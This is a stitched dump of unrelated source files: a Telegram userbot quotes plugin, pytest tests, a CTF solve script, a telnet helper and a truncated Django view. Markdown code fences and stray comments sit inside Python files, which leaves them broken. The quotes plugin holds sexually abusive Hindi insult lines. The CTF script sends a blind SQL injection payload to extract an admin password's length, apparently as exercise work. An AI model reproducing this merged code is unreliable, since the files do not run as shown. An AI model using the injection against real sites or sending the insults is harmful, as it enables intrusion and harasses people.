| 18.928571 | 54 | 0.743396 | 34 | 265 | 5.323529 | 0.794118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150943 | 265 | 13 | 55 | 20.384615 | 0.804444 | 0.339623 | 0 | 0 | 0 | 0 | 0.261905 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c4b535911ba95193b86d162ae29dd779c08ef75c | 26,047 | py | Python | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | null | null | null | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | 1 | 2022-01-09T11:35:06.000Z | 2022-01-09T11:35:06.000Z | userbot/plugins/quotes.py | aksr-aashish/FIREXUSERBOT | dff0b7bf028cb27779626ce523402346cc990402 | [
"MIT"
] | null | null | null | import random
import requests
from FIREX.utils import admin_cmd, edit_or_reply, sudo_cmd
from userbot.cmdhelp import CmdHelp
LOVESTR = [
"The best and most beautiful things in this world cannot be seen or even heard, but must be felt with the heart.",
"You know you're in love when you can't fall asleep because reality is finally better than your dreams.",
"Love recognizes no barriers. It jumps hurdles, leaps fences, penetrates walls to arrive at its destination full of hope.",
"Being deeply loved by someone gives you strength, while loving someone deeply gives you courage.",
"The real lover is the man who can thrill you by kissing your forehead or smiling into your eyes or just staring into space.",
"I swear I couldn't love you more than I do right now, and yet I know I will tomorrow.",
"When I saw you I fell in love, and you smiled because you knew it.",
"In all the world, there is no heart for me like yours. / In all the world, there is no love for you like mine.",
"To love or have loved, that is enough. Ask nothing further. There is no other pearl to be found in the dark folds of life.",
"If you live to be a hundred, I want to live to be a hundred minus one day, so I never have to live without you.",
"Some love stories aren't epic novels. Some are short stories. But that doesn't make them any less filled with love.",
"As he read, I fell in love the way you fall asleep: slowly, and then all at once.",
"I've never had a moment's doubt. I love you. I believe in you completely. You are my dearest one. My reason for life.",
"Do I love you? My god, if your love were a grain of sand, mine would be a universe of beaches.",
"I am who I am because of you.",
"I just want you to know that you're very special... and the only reason I'm telling you is that I don't know if anyone else ever has.",
"Remember, we're madly in love, so it's all right to kiss me any time you feel like it.",
"I love you. I knew it the minute I met you.",
"I loved her against reason, against promise, against peace, against hope, against happiness, against all discouragement that could be.",
"I love you not because of who you are, but because of who I am when I am with you.",
]
DHOKA = [
"Humne Unse Wafa Ki, Aur Dil Bhi Gya Toot, Wo Bhi Chinaal Nikli, Uski Maa ki Chut.",
"Dabbe Me Dabba, Dabbe Me Cake ..Tu Chutiya Hai Zara Seesha To Dekh.",
"Kaam Se Kaam Rakhoge Toh Naam Hoga, Randi Log Ke Chakkkar Me Padoge to Naam Badnaam Hoga.",
"Usne Kaha- Mah Lyf maH Rule, Maine Kaha Bhag BSDK , Tujhy Paida Karna hi Teri Baap ki Sabse Badi Vul.",
"Humse Ulajhna Mat, BSDK Teri Hasi Mita Dunga, Muh Me Land Daal Ke..Sari Hosiyaari Gand Se Nikal Dunga.",
"Aur Sunau Bhosdiwalo ..Kya Haal Hai?..Tumhare Sakal Se Zayda Toh Tumhare Gand Laal Hai!!",
"Pata Nhi Kya Kashish Hai Tumhare Mohabbat Me,Jab Bhi Tumhe Yaad Karta Hu Mera Land Khada Ho Jata Hai.",
"Konsa Mohabbat Kounsi Story, Gand Faad Dunga Agr Bolne Aayi Sorry!",
"Naam Banta Hai Risk Se, Chutiya Banta Hai IshQ Se.",
"Sun Be, Ab Tujhy Mere Zindegi Me Ane ka Koi Haq Nhi,,Aur Tu 1 Number Ki Randi Hai Isme KOi Saq Nhi.",
"Beta Tu Chugli Karna Chor De , Hum Ungli Karna Chor Dengy.",
]
METOOSTR = [
"Me too thanks",
"Haha yes, me too",
"Same lol",
"Me irl",
"Same here",
"Haha yes",
"Me rn",
]
GDNOON = [
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good Afternoon Dear!`",
"`With a deep blue sky over my head and a relaxing wind around me, the only thing I am missing right now is the company of you. I wish you a refreshing afternoon!`",
"`The day has come a halt realizing that I am yet to wish you a great afternoon. My dear, if you thought you were forgotten, you’re so wrong. Good afternoon!`",
"`Good afternoon! May the sweet peace be part of your heart today and always and there is life shining through your sigh. May you have much light and peace.`",
"`With you, every part of a day is beautiful. I live every day to love you more than yesterday. Wishing you an enjoyable afternoon my love!`",
"`This bright afternoon sun always reminds me of how you brighten my life with all the happiness. I miss you a lot this afternoon. Have a good time`!",
"`Nature looks quieter and more beautiful at this time of the day! You really don’t want to miss the beauty of this time! Wishing you a happy afternoon!`",
"`What a wonderful afternoon to finish you day with! I hope you’re having a great time sitting on your balcony, enjoying this afternoon beauty!`",
"`I wish I were with you this time of the day. We hardly have a beautiful afternoon like this nowadays. Wishing you a peaceful afternoon!`",
"`As you prepare yourself to wave goodbye to another wonderful day, I want you to know that, I am thinking of you all the time. Good afternoon!`",
"`This afternoon is here to calm your dog-tired mind after a hectic day. Enjoy the blessings it offers you and be thankful always. Good afternoon!`",
"`The gentle afternoon wind feels like a sweet hug from you. You are in my every thought in this wonderful afternoon. Hope you are enjoying the time!`",
"`Wishing an amazingly good afternoon to the most beautiful soul I have ever met. I hope you are having a good time relaxing and enjoying the beauty of this time!`",
"`Afternoon has come to indicate you, Half of your day’s work is over, Just another half a day to go, Be brisk and keep enjoying your works, Have a happy noon!`",
"`Mornings are for starting a new work, Afternoons are for remembering, Evenings are for refreshing, Nights are for relaxing, So remember people, who are remembering you, Have a happy noon!`",
"`If you feel tired and sleepy you could use a nap, you will see that it will help you recover your energy and feel much better to finish the day. Have a beautiful afternoon!`",
"`Time to remember sweet persons in your life, I know I will be first on the list, Thanks for that, Good afternoon my dear!`",
"`May this afternoon bring a lot of pleasant surprises for you and fills you heart with infinite joy. Wishing you a very warm and love filled afternoon!`",
    "`Good, better, best. Never let it rest. Til your good is better and your better is best. “Good Afternoon”`",
"`May this beautiful afternoon fill your heart boundless happiness and gives you new hopes to start yours with. May you have lot of fun! Good afternoon dear!`",
"`As the blazing sun slowly starts making its way to the west, I want you to know that this beautiful afternoon is here to bless your life with success and peace. Good afternoon!`",
"`The deep blue sky of this bright afternoon reminds me of the deepness of your heart and the brightness of your soul. May you have a memorable afternoon!`",
"`Your presence could make this afternoon much more pleasurable for me. Your company is what I cherish all the time. Good afternoon!`",
"`A relaxing afternoon wind and the sweet pleasure of your company can make my day complete. Missing you so badly during this time of the day! Good afternoon!`",
"`Wishing you an afternoon experience so sweet and pleasant that feel thankful to be alive today. May you have the best afternoon of your life today!`",
"`My wishes will always be with you, Morning wish to make you feel fresh, Afternoon wish to accompany you, Evening wish to refresh you, Night wish to comfort you with sleep, Good afternoon dear!`",
"`Noon time – it’s time to have a little break, Take time to breathe the warmth of the sun, Who is shining up in between the clouds, Good afternoon!`",
"`You are the cure that I need to take three times a day, in the morning, at the night and in the afternoon. I am missing you a lot right now. Good afternoon!`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`I pray to god that he keeps me close to you so we can enjoy these beautiful afternoons together forever! Wishing you a good time this afternoon!`",
"`You are every bit of special to me just like a relaxing afternoon is special after a toiling noon. Thinking of my special one in this special time of the day!`",
"`May your Good afternoon be light, blessed, enlightened, productive and happy.`",
"`Thinking of you is my most favorite hobby every afternoon. Your love is all I desire in life. Wishing my beloved an amazing afternoon!`",
"`I have tasted things that are so sweet, heard words that are soothing to the soul, but comparing the joy that they both bring, I’ll rather choose to see a smile from your cheeks. You are sweet. I love you.`",
"`How I wish the sun could obey me for a second, to stop its scorching ride on my angel. So sorry it will be hot there. Don’t worry, the evening will soon come. I love you.`",
"`I want you when I wake up in the morning, I want you when I go to sleep at night and I want you when I relax under the sun in the afternoon!`",
"`With you every day is my lucky day. So lucky being your love and don’t know what else to say. Morning night and noon, you make my day.`",
"`Your love is sweeter than what I read in romantic novels and fulfilling more than I see in epic films. I couldn’t have been me, without you. Good afternoon honey, I love you!`",
"`No matter what time of the day it is, No matter what I am doing, No matter what is right and what is wrong, I still remember you like this time, Good Afternoon!`",
"`Things are changing. I see everything turning around for my favor. And the last time I checked, it’s courtesy of your love. 1000 kisses from me to you. I love you dearly and wishing you a very happy noon.`",
"`You are sometimes my greatest weakness, you are sometimes my biggest strength. I do not have a lot of words to say but let you make sure, you make my day, Good Afternoon!`",
"`Every afternoon is to remember the one whom my heart beats for. The one I live and sure can die for. Hope you doing good there my love. Missing your face.`",
"`My love, I hope you are doing well at work and that you remember that I will be waiting for you at home with my arms open to pamper you and give you all my love. I wish you a good afternoon!`",
"`Afternoons like this makes me think about you more. I desire so deeply to be with you in one of these afternoons just to tell you how much I love you. Good afternoon my love!`",
"`My heart craves for your company all the time. A beautiful afternoon like this can be made more enjoyable if you just decide to spend it with me. Good afternoon!`",
]
CHASE_STR = [
"Where do you think you're going?",
"Huh? what? did they get away?",
"ZZzzZZzz... Huh? what? oh, just them again, nevermind.",
"`Get back here!`",
"`Not so fast...`",
"Look out for the wall!",
"Don't leave me alone with them!!",
"You run, you die.",
"`Jokes on you, I'm everywhere`",
"You're gonna regret that...",
"You could also try /kickme, I hear that's fun.",
"`Go bother someone else, no-one here cares.`",
"You can run, but you can't hide.",
"Is that all you've got?",
"I'm behind you...",
"You've got company!",
"We can do this the easy way, or the hard way.",
"You just don't get it, do you?",
"Yeah, you better run!",
"Please, remind me how much I care?",
"I'd run faster if I were you.",
"That's definitely the droid we're looking for.",
"May the odds be ever in your favour.",
"Famous last words.",
"And they disappeared forever, never to be seen again.",
'"Oh, look at me! I\'m so cool, I can run from a bot!" - this person',
"Yeah yeah, just tap /kickme already.",
"Here, take this ring and head to Mordor while you're at it.",
    "Legend has it, they're still running...",
"Unlike Harry Potter, your parents can't protect you from me.",
"Fear leads to anger. Anger leads to hate. Hate leads to suffering. If you keep running in fear, you might "
"be the next Vader.",
"Multiple calculations later, I have decided my interest in your shenanigans is exactly 0.",
    "Legend has it, they're still running.",
"Keep it up, not sure we want you here anyway.",
"You're a wiza- Oh. Wait. You're not Harry, keep moving.",
"NO RUNNING IN THE HALLWAYS!",
"Hasta la vista, baby.",
"Who let the dogs out?",
"It's funny, because no one cares.",
"Ah, what a waste. I liked that one.",
"Frankly, my dear, I don't give a damn.",
"My milkshake brings all the boys to yard... So run faster!",
"You can't HANDLE the truth!",
"A long time ago, in a galaxy far far away... Someone would've cared about that. Not anymore though.",
"Hey, look at them! They're running from the inevitable banhammer... Cute.",
"Han shot first. So will I.",
"What are you running after, a white rabbit?",
"As The Doctor would say... RUN!",
]
eviralOSTR = [
"Hi !",
"‘Ello, gov'nor!",
"What’s crackin’?",
"Howdy, howdy ,howdy!",
"hello, who's there, I'm talking.",
"You know who this is.",
"Yo!",
"Whaddup.",
"Greetings and salutations!",
"hello, sunshine!",
"`Hey, howdy, hi!`",
"What’s kickin’, little chicken?",
"Peek-a-boo!",
"Howdy-doody!",
"`Hey there, freshman!`",
"`I come in peace!`",
"`I come for peace!`",
"Ahoy, matey!",
"`Hi !`",
]
CONGRATULATION = [
"`Congratulations and BRAVO!`",
"`You did it! So proud of you!`",
"`This calls for celebrating! Congratulations!`",
"`I knew it was only a matter of time. Well done!`",
"`Congratulations on your well-deserved success.`",
"`Heartfelt congratulations to you.`",
"`Warmest congratulations on your achievement.`",
"`Congratulations and best wishes for your next adventure!”`",
"`So pleased to see you accomplishing great things.`",
"`Feeling so much joy for you today. What an impressive achievement!`",
]
BYESTR = [
"`Nice talking with you`",
"`I've gotta go!`",
"`I've gotta run!`",
"`I've gotta split`",
"`I'm off!`",
"`Great to see you,bye`",
"`See you soon`",
"`Farewell!`",
]
GDNIGHT = [
"`Good night keep your dreams alive`",
"`Night, night, to a dear friend! May you sleep well!`",
"`May the night fill with stars for you. May counting every one, give you contentment!`",
"`Wishing you comfort, happiness, and a good night’s sleep!`",
"`Now relax. The day is over. You did your best. And tomorrow you’ll do better. Good Night!`",
"`Good night to a friend who is the best! Get your forty winks!`",
"`May your pillow be soft, and your rest be long! Good night, friend!`",
"`Let there be no troubles, dear friend! Have a Good Night!`",
"`Rest soundly tonight, friend!`",
"`Have the best night’s sleep, friend! Sleep well!`",
"`Have a very, good night, friend! You are wonderful!`",
"`Relaxation is in order for you! Good night, friend!`",
"`Good night. May you have sweet dreams tonight.`",
"`Sleep well, dear friend and have sweet dreams.`",
"`As we wait for a brand new day, good night and have beautiful dreams.`",
"`Dear friend, I wish you a night of peace and bliss. Good night.`",
"`Darkness cannot last forever. Keep the hope alive. Good night.`",
"`By hook or crook you shall have sweet dreams tonight. Have a good night, buddy!`",
"`Good night, my friend. I pray that the good Lord watches over you as you sleep. Sweet dreams.`",
"`Good night, friend! May you be filled with tranquility!`",
"`Wishing you a calm night, friend! I hope it is good!`",
"`Wishing you a night where you can recharge for tomorrow!`",
"`Slumber tonight, good friend, and feel well rested, tomorrow!`",
"`Wishing my good friend relief from a hard day’s work! Good Night!`",
"`Good night, friend! May you have silence for sleep!`",
"`Sleep tonight, friend and be well! Know that you have done your very best today, and that you will do your very best, tomorrow!`",
"`Friend, you do not hesitate to get things done! Take tonight to relax and do more, tomorrow!`",
"`Friend, I want to remind you that your strong mind has brought you peace, before. May it do that again, tonight! May you hold acknowledgment of this with you!`",
"`Wishing you a calm, night, friend! Hoping everything winds down to your liking and that the following day meets your standards!`",
"`May the darkness of the night cloak you in a sleep that is sound and good! Dear friend, may this feeling carry you through the next day!`",
"`Friend, may the quietude you experience tonight move you to have many more nights like it! May you find your peace and hold on to it!`",
"`May there be no activity for you tonight, friend! May the rest that you have coming to you arrive swiftly! May the activity that you do tomorrow match your pace and be all of your own making!`",
"`When the day is done, friend, may you know that you have done well! When you sleep tonight, friend, may you view all the you hope for, tomorrow!`",
"`When everything is brought to a standstill, friend, I hope that your thoughts are good, as you drift to sleep! May those thoughts remain with you, during all of your days!`",
"`Every day, you encourage me to do new things, friend! May tonight’s rest bring a new day that overflows with courage and exciting events!`",
]
GDMORNING = [
"`Life is full of uncertainties. But there will always be a sunrise after every sunset. Good morning!`",
"`It doesn’t matter how bad your yesterday was. Today, you are going to make it a good one. Wishing you a good morning!`",
"`If you want to gain health and beauty, you should wake up early. Good morning!`",
"`May this morning offer you new hope for life! May you be happy and enjoy every moment of it. Good morning!`",
"`May the sun shower you with blessings and prosperity in the days ahead. Good morning!`",
"`Every sunrise marks the rise of life over death, hope over despair and happiness over suffering. Wishing you a very enjoyable morning today!`",
"`Wake up and make yourself a part of this beautiful morning. A beautiful world is waiting outside your door. Have an enjoyable time!`",
"`Welcome this beautiful morning with a smile on your face. I hope you’ll have a great day today. Wishing you a very good morning!`",
"`You have been blessed with yet another day. What a wonderful way of welcoming the blessing with such a beautiful morning! Good morning to you!`",
"`Waking up in such a beautiful morning is a guarantee for a day that’s beyond amazing. I hope you’ll make the best of it. Good morning!`",
"`Nothing is more refreshing than a beautiful morning that calms your mind and gives you reasons to smile. Good morning! Wishing you a great day.`",
"`Another day has just started. Welcome the blessings of this beautiful morning. Rise and shine like you always do. Wishing you a wonderful morning!`",
"`Wake up like the sun every morning and light up the world with your awesomeness. You have so many great things to achieve today. Good morning!`",
"`A new day has come with so many new opportunities for you. Grab them all and make the best out of your day. Here’s me wishing you a good morning!`",
"`The darkness of night has ended. A new sun is up there to guide you towards a life so bright and blissful. Good morning dear!`",
"`Wake up, have your cup of morning tea and let the morning wind freshen you up like a happiness pill. Wishing you a good morning and a good day ahead!`",
"`Sunrises are the best; enjoy a cup of coffee or tea with yourself because this day is yours, good morning! Have a wonderful day ahead.`",
"`A bad day will always have a good morning, hope all your worries are gone and everything you wish could find a place. Good morning!`",
"`A great end may not be decided but a good creative beginning can be planned and achieved. Good morning, have a productive day!`",
"`Having a sweet morning, a cup of coffee, a day with your loved ones is what sets your “Good Morning” have a nice day!`",
"`Anything can go wrong in the day but the morning has to be beautiful, so I am making sure your morning starts beautiful. Good morning!`",
"`Open your eyes with a smile, pray and thank god that you are waking up to a new beginning. Good morning!`",
"`Morning is not only sunrise but A Beautiful Miracle of God that defeats the darkness and spreads light. Good Morning.`",
"`Life never gives you a second chance. So, enjoy every bit of it. Why not start with this beautiful morning. Good Morning!`",
"`Birds are singing sweet melodies and a gentle breeze is blowing through the trees, what a perfect morning to wake you up. Good morning!`",
"`This morning is so relaxing and beautiful that I really don’t want you to miss it in any way. So, wake up dear friend. A hearty good morning to you!`",
"`Mornings come with a blank canvas. Paint it as you like and call it a day. Wake up now and start creating your perfect day. Good morning!`",
"`Every morning brings you new hopes and new opportunities. Don’t miss any one of them while you’re sleeping. Good morning!`",
"`Start your day with solid determination and great attitude. You’re going to have a good day today. Good morning my friend!`",
"`Friendship is what makes life worth living. I want to thank you for being such a special friend of mine. Good morning to you!`",
"`A friend like you is pretty hard to come by in life. I must consider myself lucky enough to have you. Good morning. Wish you an amazing day ahead!`",
"`The more you count yourself as blessed, the more blessed you will be. Thank God for this beautiful morning and let friendship and love prevail this morning.`",
"`Wake up and sip a cup of loving friendship. Eat your heart out from a plate of hope. To top it up, a fork full of kindness and love. Enough for a happy good morning!`",
"`It is easy to imagine the world coming to an end. But it is difficult to imagine spending a day without my friends. Good morning.`",
]
@bot.on(admin_cmd(pattern="love$", outgoing=True))
@bot.on(sudo_cmd(pattern="love$", allow_sudo=True))
async def love(e):
    txt = random.choice(LOVESTR)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="dhoka$", outgoing=True))
@bot.on(sudo_cmd(pattern="dhoka$", allow_sudo=True))
async def katgya(e):
    txt = random.choice(DHOKA)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="metoo$", outgoing=True))
@bot.on(sudo_cmd(pattern="metoo$", allow_sudo=True))
async def metoo(e):
    txt = random.choice(METOOSTR)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="gdnoon$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdnoon$", allow_sudo=True))
async def noon(e):
    txt = random.choice(GDNOON)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="chase$", outgoing=True))
@bot.on(sudo_cmd(pattern="chase$", allow_sudo=True))
async def police(e):
    txt = random.choice(CHASE_STR)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="congo$", outgoing=True))
@bot.on(sudo_cmd(pattern="congo$", allow_sudo=True))
async def Sahih(e):
    txt = random.choice(CONGRATULATION)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="qhi$", outgoing=True))
@bot.on(sudo_cmd(pattern="qhi$", allow_sudo=True))
async def hoi(e):
    txt = random.choice(eviralOSTR)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="gdbye$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdbye$", allow_sudo=True))
async def bhago(e):
    txt = random.choice(BYESTR)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="gdnyt$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdnyt$", allow_sudo=True))
async def night(e):
    txt = random.choice(GDNIGHT)
    await edit_or_reply(e, txt)


@bot.on(admin_cmd(pattern="gdmng$", outgoing=True))
@bot.on(sudo_cmd(pattern="gdmng$", allow_sudo=True))
async def morning(e):
    txt = random.choice(GDMORNING)
    await edit_or_reply(e, txt)
@bot.on(admin_cmd(pattern="quote ?(.*)", outgoing=True))
@bot.on(sudo_cmd(pattern="quote ?(.*)", allow_sudo=True))
async def quote_search(event):
    if event.fwd_from:
        return
    catevent = await edit_or_reply(event, "`Processing...`")
    input_str = event.pattern_match.group(1)
    if not input_str:
        api_url = "https://quotes.cwprojects.live/random"
        try:
            response = requests.get(api_url).json()
        except Exception:
            response = None
    else:
        api_url = f"https://quotes.cwprojects.live/search/query={input_str}"
        try:
            response = random.choice(requests.get(api_url).json())
        except Exception:
            response = None
    if response is not None:
        await catevent.edit(f"`{response['text']}`")
    else:
        await edit_or_reply(catevent, "`Sorry, zero results found`", 5)
CmdHelp("quotes").add_command(
    "quote", None, "Sends a random mind-blowing quote"
).add_command(
    "gdmng", None, "Sends a random Good Morning quote"
).add_command(
    "gdnyt", None, "Sends a random Good Night quote"
).add_command(
    "gdbye", None, "Sends a random Good Bye quote"
).add_command(
    "qhi", None, "Sends a random hello message"
).add_command(
    "congo", None, "Sends a random congratulations quote"
).add_command(
    "chase", None, "Sends a random chase quote"
).add_command(
    "gdnoon", None, "Sends a random Good Afternoon quote"
).add_command(
    "metoo", None, 'Sends a text saying "Mee too"'
).add_command(
    "dhoka", None, "Sends a random Dhoka quote (katt gya bc)"
).add_command(
    "love", None, "Sends a random love quote🥰. (A stage before .dhoka)"
).add()
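# All of the handlers above follow the same pick-and-reply pattern: draw one
# entry from a quote list with random.choice and send it back. A minimal,
# framework-free sketch of that pattern (the list and function names below are
# illustrative, not part of the plugin):

```python
import random

# stand-in for one of the quote lists above (e.g. eviralOSTR)
GREETINGS = ["Hi!", "Yo!", "Ahoy, matey!"]


def pick_quote(quotes):
    """Return one random entry, exactly as each handler does with random.choice."""
    return random.choice(quotes)


print(pick_quote(GREETINGS))
```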
# === File: tests/test_joints.py (repo: slaclab/pystand, license: BSD-3-Clause-LBNL) ===
############
# Standard #
############
import math
###############
# Third Party #
###############
import ophyd
import pytest
##########
# Module #
##########
from detrot import ConeJoint, AngledJoint, StandPoint, Point
from conftest import PseudoMotor
@pytest.fixture(scope='function')
def pseudo_cone():
    angled = ConeJoint(slide=PseudoMotor(5),
                       lift=PseudoMotor(10),
                       offset=Point(1, 2, 3))
    return angled


@pytest.fixture(scope='function')
def pseudo_angle():
    angled = AngledJoint(slide=PseudoMotor(5),
                         lift=PseudoMotor(10),
                         offset=Point(1, 2, 3))
    return angled
def test_cone_joint(pseudo_cone):
    # Test vertical
    pseudo_cone.alpha = math.pi/2.
    assert pytest.approx(pseudo_cone.joint.x) == 5
    assert pytest.approx(pseudo_cone.joint.y) == 10
    # Test horizontal
    pseudo_cone.alpha = 0
    assert pseudo_cone.joint.x == 15
    assert pseudo_cone.joint.y == 0


def test_cone_invert(pseudo_cone):
    # Test 45 degrees
    pseudo_cone.alpha = math.pi/4.
    assert pseudo_cone.invert((13.07, 9.07))[0] == pytest.approx(5, 0.1)
    assert pseudo_cone.invert((13.07, 9.07))[1] == pytest.approx(10, 0.1)


def test_angle_joint(pseudo_angle):
    # Test vertical
    pseudo_angle.alpha = math.pi/2.
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 10
    assert pytest.approx(pseudo_angle.joint.z) == 0
    # Test horizontal
    pseudo_angle.alpha = 0
    assert pytest.approx(pseudo_angle.joint.x) == 5
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10
    # Test no slide
    pseudo_angle.slide = None
    assert pytest.approx(pseudo_angle.joint.x) == 0
    assert pytest.approx(pseudo_angle.joint.y) == 0
    assert pytest.approx(pseudo_angle.joint.z) == 10


def test_angle_invert(pseudo_angle):
    # Test vertical
    pseudo_angle.alpha = math.pi/2.
    assert pseudo_angle.invert((6, 12))[0] == pytest.approx(5, 0.1)
    assert pseudo_angle.invert((6, 12))[1] == pytest.approx(10, 0.1)
    # Test no slide
    pseudo_angle.slide = None
    assert pseudo_angle.invert((6, 12)) == pytest.approx(10, 0.1)


def test_position(pseudo_cone):
    pseudo_cone.alpha = 0
    assert pseudo_cone.position == (16, 2, 3)
    pseudo_cone.alpha = math.pi/2.
    assert pseudo_cone.position.x == pytest.approx(6, 0.1)
    assert pseudo_cone.position.y == 12
    assert pseudo_cone.position.z == 3


def test_displacement(pseudo_angle):
    assert pseudo_angle.displacement == (5, 10)
    pseudo_angle.slide = None
    assert pseudo_angle.displacement == 10


def test_set_joint(pseudo_angle):
    # Vertical
    pseudo_angle.alpha = math.pi/2.
    pseudo_angle.set_joint((6, 12))
    assert pseudo_angle.displacement[0] == pytest.approx(5, 0.1)
    assert pseudo_angle.displacement[1] == pytest.approx(10, 0.1)
    # Test no slide
    pseudo_angle.slide = None
    pseudo_angle.set_joint((6, 12))
    assert pseudo_angle.displacement == pytest.approx(10, 0.1)


def test_model(pseudo_angle, pseudo_cone):
    model = AngledJoint.model(pseudo_angle)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    # Test no slide
    pseudo_angle.slide = None
    model = AngledJoint.model(pseudo_angle)
    assert model.slide is None
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_angle.displacement
    # Test cone
    model = ConeJoint.model(pseudo_cone)
    assert isinstance(model.slide, ophyd.SoftPositioner)
    assert isinstance(model.lift, ophyd.SoftPositioner)
    assert model.displacement == pseudo_cone.displacement


def test_stop(pseudo_cone):
    pseudo_cone.stop()
    pseudo_cone.slide.stop_call.method.assert_called_with()
    pseudo_cone.lift.stop_call.method.assert_called_with()


def test_cmp():
    p1 = PseudoMotor(5)
    p2 = PseudoMotor(10)
    assert AngledJoint(p1, p2) == AngledJoint(p1, p2)
# === File: 0x05/solve/ex1-0x05.py (repo: tuannm-1876/sec-exercises, license: MIT) ===
import urllib
import urllib2

url = "http://ctfq.sweetduet.info:10080/~q6/"


def main():
    for i in range(1, 100):
        data = {
            "id": "admin' AND (SELECT LENGTH(pass) FROM user WHERE id = 'admin') = {counter} --".format(counter=i),
            "pass": "",
        }
        print(data)
        data1 = urllib.urlencode(data).encode("utf-8")
        req = urllib2.Request(url, data1)
        res = urllib2.urlopen(req)
        print(res)
        if int(res.headers["content-length"]) > 2000:
            # translated from Vietnamese ("Do dai cua password")
            print("Password length: {counter}".format(counter=i))
            break


if __name__ == "__main__":
    main()

# === File: code_examples/package_example/my_scripts/network/connect_telnet.py (repo: natenka/natenka.github.io, license: MIT) ===
import telnetlib
import time


def send_command_telnetlib(ipaddress, username, password, enable_pass, command):
    # connect to the host passed in, rather than a hard-coded address
    t = telnetlib.Telnet(ipaddress)
    t.read_until(b"Username:")
    t.write(username.encode("ascii") + b"\n")
    t.read_until(b"Password:")
    t.write(password.encode("ascii") + b"\n")
    t.write(b"enable\n")
    t.read_until(b"Password:")
    t.write(enable_pass.encode("ascii") + b"\n")
    t.read_until(b"#")
    t.write(b"terminal length 0\n")
    t.write(command + b"\n")
    time.sleep(1)
    result = t.read_until(b"#").decode("utf-8")
    return result
# === File: pages/views.py (repo: SmartDataWithR/CovidHelper, license: MIT) ===
from django.views.generic import TemplateView
from ipware import get_client_ip
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.conf import settings
from .forms import SearchForm
from users.models import CustomUser
import geopy
from geopy.distance import geodesic
import pandas as pd
import json
from django.utils.translation import gettext as _, activate
# required for IP to numeric
import socket
import struct
# import file for ip's to language mapping
df_ip_lang = pd.read_csv('pages/lng_map.csv', names=['ip_from', 'ip_to', 'country_code', 'country_name', 'lang_code'] )
def ip(request):
    ip, is_routable = get_client_ip(request)
    if ip is None:
        ip = "0.0.0.0"
        ipv = "Private"  # no address found; default so the tuple is always defined
    else:
        ipv = "Public" if is_routable else "Private"
    return (ip, ipv)
def ip2int(addr):
    return struct.unpack("!I", socket.inet_aton(addr))[0]
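# ip2int packs the dotted-quad address into a single unsigned 32-bit integer
# in network (big-endian) byte order, which is what the ip_from/ip_to columns
# of the mapping CSV use. A self-contained check of the same one-liner:

```python
import socket
import struct


def ip2int(addr):
    # "!I" = network byte order (big-endian), unsigned 32-bit int
    return struct.unpack("!I", socket.inet_aton(addr))[0]


print(ip2int("1.2.3.4"))  # → 16909060 (0x01020304)
```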
def index(request):
    search = request.POST.get('search-field')
    searchCat = request.POST.get('search-catogery')
    locator = geopy.Nominatim(user_agent="myGeocoder")
    gotodiv = False

    # From IP to language
    # -------------------
    request_ip = ip(request)  # get request IP
    request_ip_int = ip2int(request_ip[0])  # convert IP to numeric
    df_filt = df_ip_lang[df_ip_lang.ip_from <= request_ip_int]  # filter mapping for fetched IP
    range_to_check = df_filt.iloc[-1]
    # check that the request IP falls inside the matched range
    is_in_range = (request_ip_int > range_to_check.ip_from) & (request_ip_int < range_to_check.ip_to)
    country_code = 'en-us'  # default language
    if is_in_range:  # if an entry is found in the mapping, use its language code
        country_code = range_to_check.lang_code
    activate(country_code)  # activate the current language code

    # if the user selected a language manually via the URL, use that one instead
    current_path = str(request.get_full_path()).strip('/')
    if current_path == 'en':
        activate('en-us')
    elif current_path != '':
        activate(current_path)

    context = {}
    if search is not None:
        location = locator.geocode(search, timeout=5)
        if not hasattr(location, 'longitude'):
            location = locator.geocode('Hamburg', timeout=5)
        # category 4 means 'All'; otherwise filter by group membership
        # (parameterised query instead of string concatenation to avoid SQL injection)
        if searchCat == '4':
            raw_users = CustomUser.objects.raw('SELECT * FROM users_customuser')
        else:
            raw_users = CustomUser.objects.raw(
                'SELECT * FROM users_customuser WHERE group_membership like %s', [searchCat])
        df = pd.DataFrame(
            [u.id, u.group_membership, u.longitude, u.latitude, u.slogan, u.zip_code,
             u.description, u.map_show_location, u.username, u.help_type, u.userImg_Url,
             u.shop_type] for u in raw_users)
